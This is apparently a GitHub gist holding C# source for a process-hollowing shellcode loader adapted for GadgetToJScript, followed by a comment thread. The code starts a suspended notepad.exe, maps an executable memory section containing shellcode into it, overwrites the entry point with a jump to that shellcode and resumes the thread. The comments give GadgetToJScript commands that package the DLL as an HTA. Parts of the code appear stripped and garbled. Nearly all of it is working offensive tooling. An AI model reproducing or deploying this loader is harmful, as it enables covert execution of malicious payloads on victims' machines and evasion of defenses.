Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
public class Loader
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
public static string HollowedProcessX85 = "C:\\Windows\\SysWOW64\\notepad.exe";
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
public IntPtr Reserved1;
public IntPtr PebAddress;
public IntPtr Reserved2;
public IntPtr Reserved3;
public IntPtr UniquePid;
public IntPtr MoreReserved;
internal struct STARTUPINFO
uint cb;
IntPtr lpReserved;
IntPtr lpDesktop;
IntPtr lpTitle;
uint dwX;
uint dwY;
uint dwXSize;
uint dwYSize;
uint dwXCountChars;
uint dwYCountChars;
uint dwFillAttributes;
uint dwFlags;
ushort wShowWindow;
ushort cbReserved;
IntPtr lpReserved2;
IntPtr hStdInput;
IntPtr hStdOutput;
IntPtr hStdErr;
public const uint PageReadWriteExecute = 0x40;
public const uint PageReadWrite = 0x04;
public const uint PageExecuteRead = 0x20;
public const uint MemCommit = 0x00001000;
public const uint SecCommit = 0x08000000;
public const uint GenericAll = 0x10000000;
public const uint CreateSuspended = 0x00000004;
public const uint DetachedProcess = 0x00000008;
public const uint CreateNoWindow = 0x08000000;
[DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
private static extern int ZwCreateSection(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile);
[DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
private static extern int ZwMapViewOfSection(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot);
[DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
private static extern void GetSystemInfo(ref SYSTEM_INFO lpSysInfo);
[DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
private static extern IntPtr GetCurrentProcess();
[DllImport("Kernel32.dll", CallingConvention = CallingConvention.StdCall)]
private static extern void CloseHandle(IntPtr handle);
[DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
private static extern int ZwUnmapViewOfSection(IntPtr hSection, IntPtr address);
[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation);
static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, ref PROCESS_BASIC_INFORMATION procInformation, uint ProcInfoLen, ref uint retlen);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.StdCall)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, IntPtr nSize, out IntPtr lpNumWritten);
static extern uint GetLastError();
public struct SYSTEM_INFO
public uint dwOem;
public uint dwPageSize;
public IntPtr lpMinAppAddress;
public IntPtr lpMaxAppAddress;
public IntPtr dwActiveProcMask;
public uint dwNumProcs;
public uint dwProcType;
public uint dwAllocGranularity;
public ushort wProcLevel;
public ushort wProcRevision;
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct LARGE_INTEGER
public uint LowPart;
public int HighPart;
static IntPtr section_;
static IntPtr localmap_;
static IntPtr remotemap_;
static IntPtr localsize_;
static IntPtr remotesize_;
static IntPtr pModBase_;
static IntPtr pEntry_;
static uint rvaEntryOffset_;
static uint size_;
static byte[] inner_;
public static uint round_to_page(uint size)
GetSystemInfo(ref info);
return (info.dwPageSize - size % info.dwPageSize) + size;
const int AttributeSize = 24;
private static bool nt_success(long v)
return (v >= 0);
public static IntPtr GetCurrent()
return GetCurrentProcess();
* Maps a view of the current section into the process specified in procHandle.
public static KeyValuePair<IntPtr, IntPtr> MapSection(IntPtr procHandle, uint protect, IntPtr addr)
IntPtr baseAddr = addr;
IntPtr viewSize = (IntPtr)size_;
long status = ZwMapViewOfSection(section_, procHandle, ref baseAddr, (IntPtr)0, (IntPtr)0, (IntPtr)0, ref viewSize, 1, 0, protect);
if (!nt_success(status))
throw new SystemException("[x] Something went wrong! " + status);
return new KeyValuePair<IntPtr, IntPtr>(baseAddr, viewSize);
* Attempts to create an RWX section of the given size
public static bool CreateSection(uint size)
size_ = round_to_page(size);
liVal.LowPart = size_;
long status = ZwCreateSection(ref section_, GenericAll, (IntPtr)0, ref liVal, PageReadWriteExecute, SecCommit, (IntPtr)0);
return nt_success(status);
* Maps a view of the section into the current process
public static void SetLocalSection(uint size)
KeyValuePair<IntPtr, IntPtr> vals = MapSection(GetCurrent(), PageReadWriteExecute, IntPtr.Zero);
if (vals.Key == (IntPtr)0)
throw new SystemException("[x] Failed to map view of section!");
localmap_ = vals.Key;
localsize_ = vals.Value;
* Copies the shellcode buffer into the section
public static void CopyShellcode(byte[] buf)
long lsize = size_;
if (buf.Length > lsize)
throw new IndexOutOfRangeException("[x] Shellcode buffer is too long!");
byte* p = (byte*)localmap_;
for (int i = 0; i < buf.Length; i++)
p[i] = buf[i];
* Create a new process using the binary located at "path", starting up suspended.
public static PROCESS_INFORMATION StartProcess(string path)
uint flags = CreateSuspended;// | DetachedProcess | CreateNoWindow;
if (!CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, false, flags, (IntPtr)0, (IntPtr)0, ref startInfo, out procInfo))
throw new SystemException("[x] Failed to create process!");
return procInfo;
const ulong PatchSize = 0x10;
* Constructs the shellcode patch for the new process entry point. It will build either an x86 or x64 payload based
* on the current pointer size.
* Ultimately, we will jump to the shellcode payload
public static KeyValuePair<int, IntPtr> BuildEntryPatch(IntPtr dest)
int i = 0;
IntPtr ptr;
ptr = Marshal.AllocHGlobal((IntPtr)PatchSize);
byte* p = (byte*)ptr;
byte[] tmp = null;
if (IntPtr.Size == 4)
p[i] = 0xb8; // mov eax, <imm4>
Int32 val = (Int32)dest;
tmp = BitConverter.GetBytes(val);
p[i] = 0x48; // rex
p[i] = 0xb8; // mov rax, <imm8>
Int64 val = (Int64)dest;
tmp = BitConverter.GetBytes(val);
for (int j = 0; j < IntPtr.Size; j++)
p[i + j] = tmp[j];
i += IntPtr.Size;
p[i] = 0xff;
p[i] = 0xe0; // jmp [r|e]ax
return new KeyValuePair<int, IntPtr>(i, ptr);
* We will locate the entry point for the main module in the remote process for patching.
private static IntPtr GetEntryFromBuffer(byte[] buf)
IntPtr res = IntPtr.Zero;
fixed (byte* p = buf)
uint e_lfanew_offset = *((uint*)(p + 0x3c)); // e_lfanew offset in IMAGE_DOS_HEADERS
byte* nthdr = (p + e_lfanew_offset);
byte* opthdr = (nthdr + 0x18); // IMAGE_OPTIONAL_HEADER start
ushort t = *((ushort*)opthdr);
byte* entry_ptr = (opthdr + 0x10); // entry point rva
int tmp = *((int*)entry_ptr);
rvaEntryOffset_ = (uint)tmp;
// rva -> va
if (IntPtr.Size == 4)
res = (IntPtr)(pModBase_.ToInt32() + tmp);
res = (IntPtr)(pModBase_.ToInt64() + tmp);
pEntry_ = res;
return res;
* Locate the module base addresss in the remote process,
* read in the first page, and locate the entry point.
public static IntPtr FindEntry(IntPtr hProc)
uint tmp = 0;
long success = ZwQueryInformationProcess(hProc, 0, ref basicInfo, (uint)(IntPtr.Size * 6), ref tmp);
if (!nt_success(success))
throw new SystemException("[x] Failed to get process information!");
IntPtr readLoc = IntPtr.Zero;
byte[] addrBuf = new byte[IntPtr.Size];
if (IntPtr.Size == 4)
readLoc = (IntPtr)((Int32)basicInfo.PebAddress + 8);
readLoc = (IntPtr)((Int64)basicInfo.PebAddress + 16);
IntPtr nRead = IntPtr.Zero;
if (!ReadProcessMemory(hProc, readLoc, addrBuf, addrBuf.Length, out nRead) || nRead == IntPtr.Zero)
throw new SystemException("[x] Failed to read process memory!");
if (IntPtr.Size == 4)
readLoc = (IntPtr)(BitConverter.ToInt32(addrBuf, 0));
readLoc = (IntPtr)(BitConverter.ToInt64(addrBuf, 0));
pModBase_ = readLoc;
if (!ReadProcessMemory(hProc, readLoc, inner_, inner_.Length, out nRead) || nRead == IntPtr.Zero)
throw new SystemException("[x] Failed to read module start!");
return GetEntryFromBuffer(inner_);
* Map our shellcode into the remote (suspended) process,
* locate and patch the entry point (so our code will run instead of
* the original application), and resume execution.
public static void MapAndStart(PROCESS_INFORMATION pInfo)
KeyValuePair<IntPtr, IntPtr> tmp = MapSection(pInfo.hProcess, PageReadWriteExecute, IntPtr.Zero);
if (tmp.Key == (IntPtr)0 || tmp.Value == (IntPtr)0)
throw new SystemException("[x] Failed to map section into target process!");
remotemap_ = tmp.Key;
remotesize_ = tmp.Value;
KeyValuePair<int, IntPtr> patch = BuildEntryPatch(tmp.Key);
IntPtr pSize = (IntPtr)patch.Key;
IntPtr tPtr = new IntPtr();
if (!WriteProcessMemory(pInfo.hProcess, pEntry_, patch.Value, pSize, out tPtr) || tPtr == IntPtr.Zero)
throw new SystemException("[x] Failed to write patch to start location! " + GetLastError());
if (patch.Value != IntPtr.Zero)
byte[] tbuf = new byte[0x1000];
IntPtr nRead = new IntPtr();
if (!ReadProcessMemory(pInfo.hProcess, pEntry_, tbuf, 1024, out nRead))
throw new SystemException("Failed!");
uint res = ResumeThread(pInfo.hThread);
if (res == unchecked((uint)-1))
throw new SystemException("[x] Failed to restart thread!");
public IntPtr GetBuffer()
return localmap_;
if (localmap_ != (IntPtr)0)
ZwUnmapViewOfSection(section_, localmap_);
* Given a path to a binary and a buffer of shellcode,
* 1.) start a new (supended) process
* 2.) map a view of our shellcode buffer into it
* 3.) patch the original process entry point
* 4.) resume execution
public static void Load(string targetProcess, byte[] shellcode)
PROCESS_INFORMATION pinf = StartProcess(targetProcess);
if (!CreateSection((uint)shellcode.Length))
throw new SystemException("[x] Failed to create new section!");
public Loader()
section_ = new IntPtr();
localmap_ = new IntPtr();
remotemap_ = new IntPtr();
localsize_ = new IntPtr();
remotesize_ = new IntPtr();
inner_ = new byte[0x1000]; // Reserve a page of scratch space
byte[] shellcode = new byte[184] {
0x00,0x53,0xff,0xd5 };
byte[] finalshellcode = new byte[shellcode.Length + target_.Length + 1];
Array.Copy(shellcode, finalshellcode, shellcode.Length);
Array.Copy(target_, 0, finalshellcode, shellcode.Length, target_.Length);
finalshellcode[shellcode.Length + target_.Length] = 0;
Load(HollowedProcessX85, finalshellcode);
catch (Exception e)
Console.WriteLine("[x] Something went wrong!" + e.Message);
what it the entry point here to run this dll please ?

med0x2e commented Mar 14, 2021

The default constructor "public Loader()" (when used with g2js serialized gadget ofc).

ghost commented Mar 14, 2021

i mean i've compiled this project to .dll , how i can execute it ?

med0x2e commented Mar 15, 2021

Just pass it to GadgetToJScript as an argument;

GadgetToJScript.NET4.x.exe -b -w hta -a C:\YOUR_DLL.dll -o testhta
GadgetToJScript.NET3.5.exe -r -w hta -a C:\YOUR_DLL.dll -o testhta

ghost commented Mar 15, 2021

oh ok thanks

